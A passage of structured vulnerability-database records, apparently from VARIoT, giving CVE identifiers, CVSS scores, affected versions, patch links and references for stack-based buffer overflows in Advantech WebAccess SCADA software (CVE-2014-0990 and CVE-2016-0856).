"d27b8b38-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05418" }, { "db": "VULHUB", "id": "VHN-68483" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "d27b8b38-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05418" } ] }, "last_update_date": "2024-11-23T22:38:56.021000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2014-05418)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/53296" }, { "title": "AdvantechWebAccessUSANode_20140730_3.4.3", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=51645" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05418" }, { "db": "JVNDB", "id": "JVNDB-2014-004357" }, { "db": "CNNVD", "id": "CNNVD-201409-737" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68483" }, { "db": "JVNDB", "id": "JVNDB-2014-004357" }, { "db": "NVD", "id": "CVE-2014-0990" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-261-01" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69535" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0990" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0990" }, { "trust": 0.6, "url": "http://cxsecurity.com/issue/wlb-2014090006" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0987" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com/" }, { "trust": 0.1, "url": "http://webaccess.advantech.com/." }, { "trust": 0.1, "url": "http://www.coresecurity.com." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0988" }, { "trust": 0.1, "url": "http://www.zerodayinitiative.com/advisories/published/." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0992" }, { "trust": 0.1, "url": "http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0989" }, { "trust": 0.1, "url": "https://github.com/coresecurity/sentinel." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0991" }, { "trust": 0.1, "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0990" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com." }, { "trust": 0.1, "url": "http://webaccess.advantech.com/downloads_software.php" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0986" }, { "trust": 0.1, "url": "http://support.microsoft.com/kb/2458544." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0985" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05418" }, { "db": "VULHUB", "id": "VHN-68483" }, { "db": "JVNDB", "id": "JVNDB-2014-004357" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-737" }, { "db": "NVD", "id": "CVE-2014-0990" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "d27b8b38-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05418" }, { "db": "VULHUB", "id": "VHN-68483" }, { "db": "BID", "id": "69535" }, { "db": "JVNDB", "id": "JVNDB-2014-004357" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-737" }, { "db": "NVD", "id": "CVE-2014-0990" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-09-05T00:00:00", "db": "IVD", "id": "d27b8b38-2351-11e6-abef-000c29c66e3d" }, { "date": "2014-09-05T00:00:00", "db": "CNVD", "id": "CNVD-2014-05418" }, { "date": "2014-09-20T00:00:00", "db": "VULHUB", "id": "VHN-68483" }, { "date": "2014-09-02T00:00:00", "db": "BID", "id": "69535" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004357" }, { "date": "2014-09-02T22:28:11", "db": "PACKETSTORM", "id": "128120" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-737" }, { "date": "2014-09-20T10:55:04.167000", "db": "NVD", "id": "CVE-2014-0990" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-12-29T00:00:00", "db": "CNVD", "id": "CNVD-2014-05418" }, { "date": "2015-08-05T00:00:00", "db": "VULHUB", "id": "VHN-68483" }, { "date": "2014-09-22T18:05:00", "db": "BID", "id": "69535" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004357" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-737" }, { "date": "2024-11-21T02:03:10.450000", "db": "NVD", "id": "CVE-2014-0990" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201409-737" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004357" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "d27b8b38-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201409-737" } ], "trust": 0.8 } }
var-201601-0038
Vulnerability from variot
Multiple stack-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27B0 IOCTL in the ViewSrv subsystem. A stack-based buffer overflow vulnerability exists in a call to BwBuildPath. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 11.2, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 0.6, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64dba96e-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-090" }, { "db": "ZDI", "id": "ZDI-16-062" }, { "db": "ZDI", "id": "ZDI-16-094" }, { "db": "ZDI", "id": "ZDI-16-051" }, { "db": "ZDI", "id": "ZDI-16-112" }, { "db": "ZDI", "id": "ZDI-16-079" }, { "db": "ZDI", "id": "ZDI-16-103" }, { "db": "ZDI", "id": "ZDI-16-113" }, { "db": "ZDI", "id": "ZDI-16-063" }, { "db": "ZDI", "id": "ZDI-16-092" }, { "db": "ZDI", "id": "ZDI-16-072" }, { "db": "ZDI", "id": "ZDI-16-083" }, { "db": "ZDI", "id": "ZDI-16-093" }, { "db": "ZDI", "id": "ZDI-16-073" }, { "db": "ZDI", "id": "ZDI-16-102" }, { "db": "ZDI", "id": "ZDI-16-082" }, { "db": "CNVD", "id": "CNVD-2016-00434" }, { "db": "CNNVD", "id": "CNNVD-201601-329" }, { "db": "NVD", "id": "CVE-2016-0856" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-090" }, { "db": "ZDI", "id": "ZDI-16-062" }, { "db": "ZDI", "id": "ZDI-16-094" }, { "db": "ZDI", "id": "ZDI-16-051" }, { "db": "ZDI", "id": "ZDI-16-112" }, { "db": "ZDI", "id": "ZDI-16-079" }, { "db": "ZDI", "id": "ZDI-16-103" }, { "db": "ZDI", "id": "ZDI-16-113" }, { "db": "ZDI", "id": "ZDI-16-063" }, { "db": "ZDI", "id": "ZDI-16-092" }, { "db": "ZDI", "id": "ZDI-16-072" }, { "db": "ZDI", "id": "ZDI-16-083" }, { "db": "ZDI", "id": "ZDI-16-093" }, { "db": "ZDI", "id": "ZDI-16-073" }, { "db": "ZDI", "id": "ZDI-16-102" }, { "db": "ZDI", "id": "ZDI-16-082" } ], "trust": 11.2 }, "cve": "CVE-2016-0856", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2016-0856", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 11.2, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2016-0856", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2016-00434", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "64dba96e-2351-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2016-0856", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2016-0856", "trust": 11.2, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2016-0856", "trust": 1.0, "value": "CRITICAL" }, { "author": "CNVD", "id": "CNVD-2016-00434", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201601-329", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "64dba96e-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" } ] } ], "sources": [ { "db": "IVD", "id": "64dba96e-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-090" }, { "db": "ZDI", "id": "ZDI-16-062" }, { "db": "ZDI", "id": "ZDI-16-094" }, { "db": "ZDI", "id": "ZDI-16-051" }, { "db": "ZDI", "id": "ZDI-16-112" }, { "db": "ZDI", "id": "ZDI-16-079" }, { "db": "ZDI", "id": "ZDI-16-103" }, { "db": "ZDI", "id": "ZDI-16-113" }, { "db": "ZDI", "id": "ZDI-16-063" }, { "db": "ZDI", "id": "ZDI-16-092" }, { "db": "ZDI", "id": "ZDI-16-072" }, { "db": "ZDI", "id": "ZDI-16-083" }, { "db": "ZDI", "id": "ZDI-16-093" }, { "db": "ZDI", "id": "ZDI-16-073" }, { "db": "ZDI", "id": "ZDI-16-102" }, { "db": "ZDI", "id": "ZDI-16-082" }, { "db": "CNVD", "id": "CNVD-2016-00434" }, { "db": "CNNVD", "id": "CNNVD-201601-329" }, { "db": "NVD", "id": "CVE-2016-0856" } ] }, "description": { "_id": null, "data": "Multiple stack-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27B0 IOCTL in the ViewSrv subsystem. A stack-based buffer overflow vulnerability exists in a call to BwBuildPath. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems", "sources": [ { "db": "NVD", "id": "CVE-2016-0856" }, { "db": "ZDI", "id": "ZDI-16-090" }, { "db": "ZDI", "id": "ZDI-16-082" }, { "db": "ZDI", "id": "ZDI-16-102" }, { "db": "ZDI", "id": "ZDI-16-073" }, { "db": "ZDI", "id": "ZDI-16-093" }, { "db": "ZDI", "id": "ZDI-16-083" }, { "db": "ZDI", "id": "ZDI-16-072" }, { "db": "ZDI", "id": "ZDI-16-092" }, { "db": "ZDI", "id": "ZDI-16-063" }, { "db": "ZDI", "id": "ZDI-16-113" }, { "db": "ZDI", "id": "ZDI-16-103" }, { "db": "ZDI", "id": "ZDI-16-079" }, { "db": "ZDI", "id": "ZDI-16-112" }, { "db": "ZDI", "id": "ZDI-16-051" }, { "db": "ZDI", "id": "ZDI-16-094" }, { "db": "ZDI", "id": "ZDI-16-062" }, { "db": "CNVD", "id": "CNVD-2016-00434" }, { "db": "IVD", "id": "64dba96e-2351-11e6-abef-000c29c66e3d" } ], "trust": 11.7 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2016-0856", "trust": 13.6 }, { "db": "ZDI", "id": "ZDI-16-112", "trust": 1.7 }, { "db": "ZDI", "id": "ZDI-16-103", "trust": 1.7 }, { "db": "ZDI", "id": "ZDI-16-113", "trust": 1.7 }, { "db": "ZDI", "id": "ZDI-16-102", "trust": 1.7 }, { "db": "ZDI", "id": "ZDI-16-115", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-110", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-114", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-100", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-111", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-109", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-117", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-108", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-106", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-120", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-101", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-118", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-116", "trust": 1.0 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 1.0 }, { "db": "CNVD", "id": "CNVD-2016-00434", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201601-329", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3211", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-090", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3239", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-062", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3207", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-094", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3175", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-051", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3189", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3222", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-079", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3198", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3188", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3238", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-063", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3209", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-092", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3229", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-072", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3218", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-083", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3208", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-093", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3228", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-073", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3199", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3219", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-082", "trust": 0.7 }, { "db": "CXSECURITY", "id": "WLB-2018030263", "trust": 0.6 }, { "db": "IVD", "id": "64DBA96E-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "64dba96e-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-090" }, { "db": "ZDI", "id": "ZDI-16-062" }, { "db": "ZDI", "id": "ZDI-16-094" }, { "db": "ZDI", "id": "ZDI-16-051" }, { "db": "ZDI", "id": "ZDI-16-112" }, { "db": "ZDI", "id": "ZDI-16-079" }, { "db": "ZDI", "id": "ZDI-16-103" }, { "db": "ZDI", "id": "ZDI-16-113" }, { "db": "ZDI", "id": "ZDI-16-063" }, { "db": "ZDI", "id": "ZDI-16-092" }, { "db": "ZDI", "id": "ZDI-16-072" }, { "db": "ZDI", "id": "ZDI-16-083" }, { "db": "ZDI", "id": "ZDI-16-093" }, { "db": "ZDI", "id": "ZDI-16-073" }, { "db": "ZDI", "id": "ZDI-16-102" }, { "db": "ZDI", "id": "ZDI-16-082" }, { "db": "CNVD", "id": "CNVD-2016-00434" }, { "db": "CNNVD", "id": "CNNVD-201601-329" }, { "db": "NVD", "id": "CVE-2016-0856" } ] }, "id": "VAR-201601-0038", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "64dba96e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00434" } ], "trust": 1.23470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64dba96e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00434" } ] }, "last_update_date": "2024-11-29T22:42:17.893000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 11.2, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "title": "Patch for Advantech WebAccess Stack Buffer Overflow Vulnerability (CNVD-2016-00434)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70378" }, { "title": "Advantech WebAccess Fixes for stack-based buffer overflow vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59647" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-090" }, { "db": "ZDI", "id": "ZDI-16-062" }, { "db": "ZDI", "id": "ZDI-16-094" }, { "db": "ZDI", "id": "ZDI-16-051" }, { "db": "ZDI", "id": "ZDI-16-112" }, { "db": "ZDI", "id": "ZDI-16-079" }, { "db": "ZDI", "id": "ZDI-16-103" }, { "db": "ZDI", "id": "ZDI-16-113" }, { "db": "ZDI", "id": "ZDI-16-063" }, { "db": "ZDI", "id": "ZDI-16-092" }, { "db": "ZDI", "id": "ZDI-16-072" }, { "db": "ZDI", "id": "ZDI-16-083" }, { "db": "ZDI", "id": "ZDI-16-093" }, { "db": "ZDI", "id": "ZDI-16-073" }, { "db": "ZDI", "id": "ZDI-16-102" }, { "db": "ZDI", "id": "ZDI-16-082" }, { "db": "CNVD", "id": "CNVD-2016-00434" }, { "db": "CNNVD", "id": "CNNVD-201601-329" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-119", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2016-0856" } ] }, "references": { "_id": null, "data": [ { "trust": 12.2, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-120" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-103" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-112" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-109" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-113" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-101" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-114" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-117" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-118" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-102" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-100" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-110" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-111" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-115" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-116" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-108" }, { "trust": 1.0, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-106" }, { "trust": 0.6, "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0856" }, { "trust": 0.6, "url": "https://cxsecurity.com/issue/wlb-2018030263" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-090" }, { "db": "ZDI", "id": "ZDI-16-062" }, { "db": "ZDI", "id": "ZDI-16-094" }, { "db": "ZDI", "id": "ZDI-16-051" }, { "db": "ZDI", "id": "ZDI-16-112" }, { "db": "ZDI", "id": "ZDI-16-079" }, { "db": "ZDI", "id": "ZDI-16-103" }, { "db": "ZDI", "id": "ZDI-16-113" }, { "db": "ZDI", "id": "ZDI-16-063" }, { "db": "ZDI", "id": "ZDI-16-092" }, { "db": "ZDI", "id": "ZDI-16-072" }, { "db": "ZDI", "id": "ZDI-16-083" }, { "db": "ZDI", "id": "ZDI-16-093" }, { "db": "ZDI", "id": "ZDI-16-073" }, { "db": "ZDI", "id": "ZDI-16-102" }, { "db": "ZDI", "id": "ZDI-16-082" }, { "db": "CNVD", "id": "CNVD-2016-00434" }, { "db": "CNNVD", "id": "CNNVD-201601-329" }, { "db": "NVD", "id": "CVE-2016-0856" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "64dba96e-2351-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-16-090", "ident": null }, { "db": "ZDI", "id": "ZDI-16-062", "ident": null }, { "db": "ZDI", "id": "ZDI-16-094", "ident": null }, { "db": "ZDI", "id": "ZDI-16-051", "ident": null }, { "db": "ZDI", "id": "ZDI-16-112", "ident": null }, { "db": "ZDI", "id": "ZDI-16-079", "ident": null }, { "db": "ZDI", "id": "ZDI-16-103", "ident": null }, { "db": "ZDI", "id": "ZDI-16-113", "ident": null }, { "db": "ZDI", "id": "ZDI-16-063", "ident": null }, { "db": "ZDI", "id": "ZDI-16-092", "ident": null }, { "db": "ZDI", "id": "ZDI-16-072", "ident": null }, { "db": "ZDI", "id": "ZDI-16-083", "ident": null }, { "db": "ZDI", "id": "ZDI-16-093", "ident": null }, { "db": "ZDI", "id": "ZDI-16-073", "ident": null }, { "db": "ZDI", "id": "ZDI-16-102", "ident": null }, { "db": "ZDI", "id": "ZDI-16-082", "ident": null }, { "db": "CNVD", "id": "CNVD-2016-00434", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201601-329", "ident": null }, { "db": "NVD", "id": "CVE-2016-0856", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-01-25T00:00:00", "db": "IVD", "id": "64dba96e-2351-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-090", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-062", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-094", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-051", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-112", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-079", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-103", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-113", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-063", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-092", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-072", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-083", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-093", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-073", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-102", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-082", "ident": null }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00434", "ident": null }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-329", "ident": null }, { "date": "2016-01-15T03:59:18.250000", "db": "NVD", "id": "CVE-2016-0856", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-090", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-062", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-094", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-051", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-112", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-079", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-103", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-113", "ident": null }, { "date": "2016-02-05T00:00:00", "db": 